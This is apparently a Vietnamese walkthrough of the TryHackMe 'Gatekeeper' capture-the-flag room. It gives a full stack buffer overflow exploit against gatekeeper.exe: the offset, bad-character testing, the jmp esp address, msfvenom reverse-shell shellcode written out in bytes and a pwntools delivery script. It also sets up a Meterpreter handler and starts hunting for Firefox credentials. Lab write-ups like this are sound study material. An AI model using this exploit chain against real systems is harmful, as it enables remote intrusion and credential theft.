

Tìm thấy một số port của SMB:

# Nmap 7.95 scan initiated Wed Oct 16 22:01:46 2024 as: nmap -A -T3 -p 1-1000 -Pn -oN nmap.log
Nmap scan report for
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (conn-refused)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-10-16T15:01:56
|_  start_date: 2024-10-16T14:57:15
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:79:f9:d8:05:c3 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-10-16T11:01:56-04:00
|_clock-skew: mean: 1h19m43s, deviation: 2h18m34s, median: -17s
Service detection performed. Please report any incorrect results at .
# Nmap done at Wed Oct 16 22:02:19 2024 -- 1 IP address (1 host up) scanned in 33.43 seconds

Thăm dò các thư mục chia sẻ:

# Nmap 7.95 scan initiated Wed Oct 16 22:08:19 2024 as: nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse -oN nmap-smb.log
Nmap scan report for
Host is up (0.26s latency).
445/tcp open  microsoft-ds
Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\\ADMIN$: 
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\\C$: 
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\\IPC$: 
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\\Users: 
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ
# Nmap done at Wed Oct 16 22:09:09 2024 -- 1 IP address (1 host up) scanned in 49.95 seconds

Tìm thấy port của RDP:

# Nmap 7.95 scan initiated Wed Oct 16 21:57:45 2024 as: nmap -A -T3 -p 1001-4000 -Pn -oN nmap.log
Nmap scan report for
Host is up (0.26s latency).
Not shown: 2999 closed tcp ports (conn-refused)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2024-10-15T14:57:16
|_Not valid after:  2025-04-16T14:57:16
|_ssl-date: 2024-10-16T14:59:49+00:00; -16s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -16s
Service detection performed. Please report any incorrect results at .
# Nmap done at Wed Oct 16 22:00:06 2024 -- 1 IP address (1 host up) scanned in 140.84 seconds


Sử dụng naabu và tìm thêm được một port:


Kết nối đến thư mục Users với tài khoản ẩn danh (anonymous) và tìm được một tập tin thực thi có tên là gatekeeper.exe:

smbclient //
Password for [MYGROUP\aleister]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri May 15 08:57:08 2020
  ..                                 DR        0  Fri May 15 08:57:08 2020
  Default                           DHR        0  Tue Jul 14 14:07:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 11:54:24 2009
  Share                               D        0  Fri May 15 08:58:07 2020
		7863807 blocks of size 4096. 3878816 blocks available
smb: \> cd Share
smb: \Share\> ls
  .                                   D        0  Fri May 15 08:58:07 2020
  ..                                  D        0  Fri May 15 08:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 12:27:17 2020

Tải về gatekeeper.exe và sử dụng strings. Tìm thấy số 31137 trùng với port mà ta đã tìm được thông qua naabu:

getaddrinfo failed: %d
socket() failed with error: %ld
bind() failed with error: %d
listen() failed with error: %ld
[+] Listening for connections.
accept failed: %d
Received connection from remote host.
Connection handed off to handler thread.
Please send shorter lines.
[!] recvbuf exhausted. Giving up.
Client disconnected.
recv() failed: %d.
Bytes received: %d
Client requested exit.
Hello %s!!!
send failed: %d
Bytes sent: %d
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />

Sử dụng nmap quét lại để chắc chắn:

nmap -T3 -p 31337 -Pn
Starting Nmap 7.95 ( ) at 2024-10-16 22:18 +07
Nmap scan report for
Host is up (0.27s latency).
31337/tcp open  Elite
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

Như vậy, có thể port 31337 đang chạy tập tin thực thi gatekeeper.exe.

Thử kết nối đến port 31337 thông qua ncpwntools:

nc 31337
Hello A!!!
>>> conn = remote("",31337)
[x] Opening connection to on port 31337
[x] Opening connection to on port 31337: Trying
[+] Opening connection to on port 31337: Done
>>> conn.send(b"A\n")
>>> conn.recvline()
b'Hello A!!!\n'

Từ kết quả trên, có vẻ như ta cần phải thực hiện việc khai thác nhị phân ở trên gatekeeper.exe.


Ngoại lệ xảy ra khi làm tràn biến buf bằng một chuỗi dài:

Finding Offset

Tìm số lượng byte cần dùng để gây tràn bộ đệm (ta gọi giá trị đó là offset):

Python 3.10.0 (default, Sep  5 2024, 17:36:31) [GCC 13.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> g = cyclic_gen()
>>> g.get(200)
>>> g.find(b'amba')
>>> g.find(b'abma')
(146, 0, 146)

Thử truyền vào một chuỗi tuần hoàn có kích thước là 146 byte:

>>> g.get(146)

Giá trị của EIP sau khi chương trình bị crash:

Giá trị 0x0a212121 có thể là chuỗi hậu tố !!!\n:

>>> bytearray.fromhex("0a212121").decode()
>>> bytearray.fromhex("2121210a").decode()

Hậu tố này xuất hiện khi ta gửi dữ liệu thông qua ncpwntools!

Như vậy, ta chắc chắn rằng gatekeeper.exe chứa lỗ hổng tràn bộ nhớ đệm.

Địa chỉ cơ sở của gatekeeper:

>>> import pefile
>>> pe = pefile.PE("gatekeeper.exe")
>>> print(f'Base Address: {hex(pe.OPTIONAL_HEADER.ImageBase)}')
Base Address: 0x8040000

Bad Characters

Để xác định các “ký tự xấu” (bad characters), chúng ta sẽ tạo một payload bao gồm toàn bộ các ký tự có thể có.

>>> for x in range(1, 256):
...     print("\\x" + "{:02x}".format(x), end='')
x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff>>> print()
>>> payload = b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'

Payload này sau đó được truyền vào chương trình gatekeeper.exe để quan sát hành vi của từng ký tự. Nếu một ký tự bị thay đổi, bị loại bỏ, hoặc làm ảnh hưởng đến các ký tự khác trong quá trình xử lý, ký tự đó được coi là bad character.

Shellcode được tạo bằng msfvenom có thể chứa những ký tự này, dẫn đến lỗi khi thực thi. Do đó, ta cần phát hiện và loại bỏ bad characters khỏi shellcode là bước quan trọng để đảm bảo nó hoạt động một cách ổn định và chính xác.


Payload trên sẽ xuất hiện ở trên stack tại một thời điểm nhất định:

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0x00c819e2  →  0x0e0d0c0b  →  0x00000000
$ebx   : 0x0045c348  →  0x0000013c
$ecx   : 0x40      
$edx   : 0xffffffff
$esp   : 0x00c819d0  →  0x00000040 ("@"?)
$ebp   : 0x00c8ff24  →  0x00c8ff50  →  0x00c8ff68  →  0x00c8ff80  →  0x00c8ffec  →  0x00000000
$esi   : 0x00950688  →  0x00000048 ("H"?)
$edi   : 0x0       
$eip   : 0x0804168d  →  0x00005ee8
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x63 $gs: 0x6b 
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00c819d0│+0x0000: 0x00000040 ("@"?)	← $esp
0x00c819d4│+0x0004: 0x00c819e2  0x0e0d0c0b  0x00000000
0x00c819d8│+0x0008: 0x04030201  0x00000000
0x00c819dc│+0x000c: 0x08070605  0x00000000
0x00c819e0│+0x0010: 0x0c0b0009  0x00000000
0x00c819e4│+0x0014: 0x100f0e0d  0x00000000
0x00c819e8│+0x0018: 0x14131211  0x00000000
0x00c819ec│+0x001c: 0x18171615  0x00000000

Ta sẽ trích xuất chính xác 256 byte trong bộ nhớ tại địa chỉ 0x00c819d8:

gef➤  dump memory dump.bin 0x00c819d8 0x00c819d8 + 0x100

Các bad character đã được trích xuất và ở dạng thập lục phân:

xxd badchars.bin
00000000: 0001 0203 0405 0607 0809 0a0b 0c0d 0e0f  ................
00000010: 1011 1213 1415 1617 1819 1a1b 1c1d 1e1f  ................
00000020: 2021 2223 2425 2627 2829 2a2b 2c2d 2e2f   !"#$%&'()*+,-./
00000030: 3031 3233 3435 3637 3839 3a3b 3c3d 3e3f  0123456789:;<=>?
00000040: 4041 4243 4445 4647 4849 4a4b 4c4d 4e4f  @ABCDEFGHIJKLMNO
00000050: 5051 5253 5455 5657 5859 5a5b 5c5d 5e5f  PQRSTUVWXYZ[\]^_
00000060: 6061 6263 6465 6667 6869 6a6b 6c6d 6e6f  `abcdefghijklmno
00000070: 7071 7273 7475 7677 7879 7a7b 7c7d 7e7f  pqrstuvwxyz{|}~.
00000080: 8081 8283 8485 8687 8889 8a8b 8c8d 8e8f  ................
00000090: 9091 9293 9495 9697 9899 9a9b 9c9d 9e9f  ................
000000a0: a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf  ................
000000b0: b0b1 b2b3 b4b5 b6b7 b8b9 babb bcbd bebf  ................
000000c0: c0c1 c2c3 c4c5 c6c7 c8c9 cacb cccd cecf  ................
000000d0: d0d1 d2d3 d4d5 d6d7 d8d9 dadb dcdd dedf  ................
000000e0: e0e1 e2e3 e4e5 e6e7 e8e9 eaeb eced eeef  ................
000000f0: f0f1 f2f3 f4f5 f6f7 f8f9 fafb fcfd feff  ................

Sử dụng diff để tìm những byte khác nhau giữa badchars.bin (là tập tin chứa các bad character mà ta dùng làm payload) và dump.bin:

diff <(xxd badchars.bin) <(xxd dump.bin)
< 00000000: 0001 0203 0405 0607 0809 0a0b 0c0d 0e0f  ................
> 00000000: 0001 0203 0405 0607 0809 000b 0c0d 0e0f  ................

Tìm thấy một bad character là 0x0a (ký tự \n).

Tạo ra shellcode mà không có ký tự 0x00 (ký tự này luôn được xem là bad character) và 0x0a:

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 -f exe -e x86/shikata_ga_nai -b "\x00\x0a" -f python -v payload

Giải thích các tùy chọn:

  • -p chỉ định loại reverse shell
  • -f định dạng của reverse shell sẽ là tập tin thực thi (exe)
  • -b loại trừ ký tự 0x000x0a ở trong shellcode
  • -e chỉ định encoder
  • -v chỉ định biến được dùng để lưu shellcode mà sẽ được hiển thị ở trong kết quả thực thi của câu lệnh

Xây dựng payload sử dụng Python shell:

>>> payload = g.get(146) + p32(0x080414c3) + b'\x90'*16
>>> payload += b"\xba\xa3\xe0\xbc\x4c\xda\xc5\xd9\x74\x24\xf4"
>>> payload += b"\x5f\x29\xc9\xb1\x52\x83\xef\xfc\x31\x57\x0e"
>>> payload += b"\x03\xf4\xee\x5e\xb9\x06\x06\x1c\x42\xf6\xd7"
>>> payload += b"\x41\xca\x13\xe6\x41\xa8\x50\x59\x72\xba\x34"
>>> payload += b"\x56\xf9\xee\xac\xed\x8f\x26\xc3\x46\x25\x11"
>>> payload += b"\xea\x57\x16\x61\x6d\xd4\x65\xb6\x4d\xe5\xa5"
>>> payload += b"\xcb\x8c\x22\xdb\x26\xdc\xfb\x97\x95\xf0\x88"
>>> payload += b"\xe2\x25\x7b\xc2\xe3\x2d\x98\x93\x02\x1f\x0f"
>>> payload += b"\xaf\x5c\xbf\xae\x7c\xd5\xf6\xa8\x61\xd0\x41"
>>> payload += b"\x43\x51\xae\x53\x85\xab\x4f\xff\xe8\x03\xa2"
>>> payload += b"\x01\x2d\xa3\x5d\x74\x47\xd7\xe0\x8f\x9c\xa5"
>>> payload += b"\x3e\x05\x06\x0d\xb4\xbd\xe2\xaf\x19\x5b\x61"
>>> payload += b"\xa3\xd6\x2f\x2d\xa0\xe9\xfc\x46\xdc\x62\x03"
>>> payload += b"\x88\x54\x30\x20\x0c\x3c\xe2\x49\x15\x98\x45"
>>> payload += b"\x75\x45\x43\x39\xd3\x0e\x6e\x2e\x6e\x4d\xe7"
>>> payload += b"\x83\x43\x6d\xf7\x8b\xd4\x1e\xc5\x14\x4f\x88"
>>> payload += b"\x65\xdc\x49\x4f\x89\xf7\x2e\xdf\x74\xf8\x4e"
>>> payload += b"\xf6\xb2\xac\x1e\x60\x12\xcd\xf4\x70\x9b\x18"
>>> payload += b"\x5a\x20\x33\xf3\x1b\x90\xf3\xa3\xf3\xfa\xfb"
>>> payload += b"\x9c\xe4\x05\xd6\xb4\x8f\xfc\xb1\xc5\x4f\xfe"
>>> payload += b"\x40\x52\x52\xfe\x47\x9b\xdb\x18\x2d\xcb\x8d"
>>> payload += b"\xb3\xda\x72\x94\x4f\x7a\x7a\x02\x2a\xbc\xf0"
>>> payload += b"\xa1\xcb\x73\xf1\xcc\xdf\xe4\xf1\x9a\xbd\xa3"
>>> payload += b"\x0e\x31\xa9\x28\x9c\xde\x29\x26\xbd\x48\x7e"
>>> payload += b"\x6f\x73\x81\xea\x9d\x2a\x3b\x08\x5c\xaa\x04"
>>> payload += b"\x88\xbb\x0f\x8a\x11\x49\x2b\xa8\x01\x97\xb4"
>>> payload += b"\xf4\x75\x47\xe3\xa2\x23\x21\x5d\x05\x9d\xfb"
>>> payload += b"\x32\xcf\x49\x7d\x79\xd0\x0f\x82\x54\xa6\xef"
>>> payload += b"\x33\x01\xff\x10\xfb\xc5\xf7\x69\xe1\x75\xf7"
>>> payload += b"\xa0\xa1\x86\xb2\xe8\x80\x0e\x1b\x79\x91\x52"
>>> payload += b"\x9c\x54\xd6\x6a\x1f\x5c\xa7\x88\x3f\x15\xa2"
>>> payload += b"\xd5\x87\xc6\xde\x46\x62\xe8\x4d\x66\xa7"
>>> payload
b'ajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaak\xc3\x14\x04\x08\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xba\xa3\xe0\xbcL\xda\xc5\xd9t$\xf4_)\xc9\xb1R\x83\xef\xfc1W\x0e\x03\xf4\xee^\xb9\x06\x06\x1cB\xf6\xd7A\xca\x13\xe6A\xa8PYr\xba4V\xf9\xee\xac\xed\x8f&\xc3F%\x11\xeaW\x16am\xd4e\xb6M\xe5\xa5\xcb\x8c"\xdb&\xdc\xfb\x97\x95\xf0\x88\xe2%{\xc2\xe3-\x98\x93\x02\x1f\x0f\xaf\\\xbf\xae|\xd5\xf6\xa8a\xd0ACQ\xaeS\x85\xabO\xff\xe8\x03\xa2\x01-\xa3]tG\xd7\xe0\x8f\x9c\xa5>\x05\x06\r\xb4\xbd\xe2\xaf\x19[a\xa3\xd6/-\xa0\xe9\xfcF\xdcb\x03\x88T0 \x0c<\xe2I\x15\x98EuEC9\xd3\x0en.nM\xe7\x83Cm\xf7\x8b\xd4\x1e\xc5\x14O\x88e\xdcIO\x89\xf7.\xdft\xf8N\xf6\xb2\xac\x1e`\x12\xcd\xf4p\x9b\x18Z 3\xf3\x1b\x90\xf3\xa3\xf3\xfa\xfb\x9c\xe4\x05\xd6\xb4\x8f\xfc\xb1\xc5O\xfe@RR\xfeG\x9b\xdb\x18-\xcb\x8d\xb3\xdar\x94Ozz\x02*\xbc\xf0\xa1\xcbs\xf1\xcc\xdf\xe4\xf1\x9a\xbd\xa3\x0e1\xa9(\x9c\xde)&\xbdH~os\x81\xea\x9d*;\x08\\\xaa\x04\x88\xbb\x0f\x8a\x11I+\xa8\x01\x97\xb4\xf4uG\xe3\xa2#!]\x05\x9d\xfb2\xcfI}y\xd0\x0f\x82T\xa6\xef3\x01\xff\x10\xfb\xc5\xf7i\xe1u\xf7\xa0\xa1\x86\xb2\xe8\x80\x0e\x1by\x91R\x9cT\xd6j\x1f\\\xa7\x88?\x15\xa2\xd5\x87\xc6\xdeFb\xe8Mf\xa7'

Với 0x080414c3 là địa chỉ của chỉ thị jmp esp mà ta sẽ ghi đè vào EIP. Khi chạy chỉ thị này, shellcode ở trên stack sẽ được thực thi.

Thử khai thác ở localhost (sử dụng Wine để chạy tập tin thực thi ở trên Linux) bằng cách gửi payload đến port 31337:

>>> conn = remote(ip, port)
[x] Opening connection to on port 31337
[x] Opening connection to on port 31337: Trying
[+] Opening connection to on port 31337: Done
>>> conn.sendline(payload)

Nhận được reverse shell:

nc -vnlp 1337
Listening on 1337
Connection received on 57804
Microsoft Windows 10.0.19043

Điều chỉnh shellcode bằng cách thay đổi địa chỉ lắng nghe reverse shell thành interface của VPN dùng để kết nối đến mạng của TryHackMe:

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f exe -e x86/shikata_ga_nai -b "\x00\x0a" -f python -v payload
payload += b"\xda\xc6\xd9\x74\x24\xf4\xbd\xa7\xf2\x1c\xbc"
payload += b"\x58\x29\xc9\xb1\x52\x31\x68\x17\x03\x68\x17"
payload += b"\x83\x67\xf6\xfe\x49\x9b\x1f\x7c\xb1\x63\xe0"
payload += b"\xe1\x3b\x86\xd1\x21\x5f\xc3\x42\x92\x2b\x81"
payload += b"\x6e\x59\x79\x31\xe4\x2f\x56\x36\x4d\x85\x80"
payload += b"\x79\x4e\xb6\xf1\x18\xcc\xc5\x25\xfa\xed\x05"
payload += b"\x38\xfb\x2a\x7b\xb1\xa9\xe3\xf7\x64\x5d\x87"
payload += b"\x42\xb5\xd6\xdb\x43\xbd\x0b\xab\x62\xec\x9a"
payload += b"\xa7\x3c\x2e\x1d\x6b\x35\x67\x05\x68\x70\x31"
payload += b"\xbe\x5a\x0e\xc0\x16\x93\xef\x6f\x57\x1b\x02"
payload += b"\x71\x90\x9c\xfd\x04\xe8\xde\x80\x1e\x2f\x9c"
payload += b"\x5e\xaa\xab\x06\x14\x0c\x17\xb6\xf9\xcb\xdc"
payload += b"\xb4\xb6\x98\xba\xd8\x49\x4c\xb1\xe5\xc2\x73"
payload += b"\x15\x6c\x90\x57\xb1\x34\x42\xf9\xe0\x90\x25"
payload += b"\x06\xf2\x7a\x99\xa2\x79\x96\xce\xde\x20\xff"
payload += b"\x23\xd3\xda\xff\x2b\x64\xa9\xcd\xf4\xde\x25"
payload += b"\x7e\x7c\xf9\xb2\x81\x57\xbd\x2c\x7c\x58\xbe"
payload += b"\x65\xbb\x0c\xee\x1d\x6a\x2d\x65\xdd\x93\xf8"
payload += b"\x2a\x8d\x3b\x53\x8b\x7d\xfc\x03\x63\x97\xf3"
payload += b"\x7c\x93\x98\xd9\x14\x3e\x63\x8a\x10\xb4\x24"
payload += b"\x69\x4d\xc8\xba\x68\xb4\x45\x5c\x18\xd6\x03"
payload += b"\xf7\xb5\x4f\x0e\x83\x24\x8f\x84\xee\x67\x1b"
payload += b"\x2b\x0f\x29\xec\x46\x03\xde\x1c\x1d\x79\x49"
payload += b"\x22\x8b\x15\x15\xb1\x50\xe5\x50\xaa\xce\xb2"
payload += b"\x35\x1c\x07\x56\xa8\x07\xb1\x44\x31\xd1\xfa"
payload += b"\xcc\xee\x22\x04\xcd\x63\x1e\x22\xdd\xbd\x9f"
payload += b"\x6e\x89\x11\xf6\x38\x67\xd4\xa0\x8a\xd1\x8e"
payload += b"\x1f\x45\xb5\x57\x6c\x56\xc3\x57\xb9\x20\x2b"
payload += b"\xe9\x14\x75\x54\xc6\xf0\x71\x2d\x3a\x61\x7d"
payload += b"\xe4\xfe\x91\x34\xa4\x57\x3a\x91\x3d\xea\x27"
payload += b"\x22\xe8\x29\x5e\xa1\x18\xd2\xa5\xb9\x69\xd7"
payload += b"\xe2\x7d\x82\xa5\x7b\xe8\xa4\x1a\x7b\x39"

Gửi lại payload mới và nhận được reverse shell:

nc -vnlp 1337
Listening on 1337
Connection received on 49176
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

Lấy flag của user:

 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B
 Directory of C:\Users\natbat\Desktop
05/14/2020  09:24 PM    <DIR>          .
05/14/2020  09:24 PM    <DIR>          ..
04/21/2020  05:00 PM             1,197 Firefox.lnk
04/20/2020  01:27 AM            13,312 gatekeeper.exe
04/21/2020  09:53 PM               135 gatekeeperstart.bat
05/14/2020  09:43 PM               140 user.txt.txt
               4 File(s)         14,784 bytes
               2 Dir(s)  15,850,008,576 bytes free
C:\Users\natbat\Desktop>type user.txt.txt
type user.txt.txt
The buffer overflow in this room is credited to Justin Steven and his 
"dostackbufferoverflowgood" program.  Thank you!


Trước tiên, nâng cấp shell lên thành Meterpreter bằng cách sinh ra một shellcode mới:

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 1337; exploit"


Thăm dò các dịch vụ đang chạy ở trên máy:

C:\Users\mayor>sc queryex type=service
sc queryex type=service
[SC] EnumQueryServicesStatus:OpenService FAILED 1060:
The specified service does not exist as an installed service.

Tập tin C:\Windows\Panther\Unattend.xml cũng không có mật khẩu:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
  <LocalAccount wcm:action="add">

Thư mục sysprep không có gì:

meterpreter > cd sysprep
meterpreter > dir
Listing: C:\Windows\System32\sysprep
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2011-04-12 15:17:52 +0700  en-US

Không có quyền truy cập vào tập tin config:

meterpreter > pwd
meterpreter > cat config
[-] config is a directory
meterpreter > cd config
[-] stdapi_fs_chdir: Operation failed: Access is denied.



Firefox Credentials Dumping

Tìm kiếm thông tin xác thực ở trong cache của Firefox:

meterpreter > ls ljfn812a.default-release\\
Listing: ljfn812a.default-release\
Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  0        fil   2020-05-15 09:45:02 +0700  AlternateServices.txt
100666/rw-rw-rw-  0        fil   2020-05-15 09:45:02 +0700  SecurityPreloadState.txt
100666/rw-rw-rw-  1357     fil   2020-05-15 09:45:02 +0700  SiteSecurityServiceState.txt
100666/rw-rw-rw-  0        fil   2020-05-15 09:45:02 +0700  TRRBlacklist.txt
100666/rw-rw-rw-  1952     fil   2020-05-15 09:23:37 +0700  addonStartup.json.lz4
100666/rw-rw-rw-  24       fil   2020-05-15 09:30:01 +0700  addons.json
040777/rwxrwxrwx  0        dir   2020-05-15 09:30:03 +0700  bookmarkbackups
100666/rw-rw-rw-  216      fil   2020-05-15 09:24:23 +0700  broadcast-listeners.json
100666/rw-rw-rw-  229376   fil   2020-04-22 11:47:01 +0700  cert9.db
100666/rw-rw-rw-  220      fil   2020-04-22 04:00:37 +0700  compatibility.ini
100666/rw-rw-rw-  939      fil   2020-04-22 04:00:47 +0700  containers.json
100666/rw-rw-rw-  229376   fil   2020-04-22 04:00:45 +0700  content-prefs.sqlite
100666/rw-rw-rw-  524288   fil   2020-05-15 09:45:02 +0700  cookies.sqlite
040777/rwxrwxrwx  0        dir   2020-05-15 09:24:27 +0700  crashes
040777/rwxrwxrwx  4096     dir   2020-05-15 09:45:02 +0700  datareporting
100666/rw-rw-rw-  1111     fil   2020-04-22 04:00:47 +0700  extension-preferences.json
040777/rwxrwxrwx  0        dir   2020-04-22 04:00:38 +0700  extensions
100666/rw-rw-rw-  39565    fil   2020-05-15 09:34:00 +0700  extensions.json
100666/rw-rw-rw-  5242880  fil   2020-05-15 09:45:02 +0700  favicons.sqlite
100666/rw-rw-rw-  196608   fil   2020-05-15 09:39:42 +0700  formhistory.sqlite
040777/rwxrwxrwx  0        dir   2020-04-22 09:50:09 +0700  gmp-gmpopenh264
040777/rwxrwxrwx  0        dir   2020-04-22 09:50:11 +0700  gmp-widevinecdm
100666/rw-rw-rw-  540      fil   2020-04-22 04:00:48 +0700  handlers.json
100666/rw-rw-rw-  294912   fil   2020-04-22 04:02:11 +0700  key4.db
100666/rw-rw-rw-  600      fil   2020-05-15 09:43:47 +0700  logins.json
040777/rwxrwxrwx  0        dir   2020-04-22 04:00:37 +0700  minidumps
100666/rw-rw-rw-  0        fil   2020-05-15 09:23:30 +0700  parent.lock
100666/rw-rw-rw-  98304    fil   2020-05-15 09:25:44 +0700  permissions.sqlite
100666/rw-rw-rw-  506      fil   2020-04-22 04:00:40 +0700  pkcs11.txt
100666/rw-rw-rw-  5242880  fil   2020-05-15 09:45:02 +0700  places.sqlite
100666/rw-rw-rw-  11096    fil   2020-05-15 09:45:02 +0700  prefs.js
100666/rw-rw-rw-  65536    fil   2020-05-15 09:45:02 +0700  protections.sqlite
040777/rwxrwxrwx  0        dir   2020-05-15 09:45:03 +0700  saved-telemetry-pings
100666/rw-rw-rw-  2715     fil   2020-05-15 09:23:31 +0700  search.json.mozlz4
040777/rwxrwxrwx  0        dir   2020-04-22 09:50:13 +0700  security_state
100666/rw-rw-rw-  288      fil   2020-05-15 09:45:02 +0700  sessionCheckpoints.json
040777/rwxrwxrwx  4096     dir   2020-05-15 09:45:02 +0700  sessionstore-backups
100666/rw-rw-rw-  12889    fil   2020-05-15 09:45:02 +0700  sessionstore.jsonlz4
100666/rw-rw-rw-  18       fil   2020-04-22 04:00:41 +0700  shield-preference-experiments.json
040777/rwxrwxrwx  0        dir   2020-04-22 04:00:40 +0700  storage
100666/rw-rw-rw-  4096     fil   2020-05-15 09:45:02 +0700  storage.sqlite
100666/rw-rw-rw-  50       fil   2020-04-22 04:00:39 +0700  times.json
040777/rwxrwxrwx  0        dir   2020-04-22 04:00:59 +0700  weave
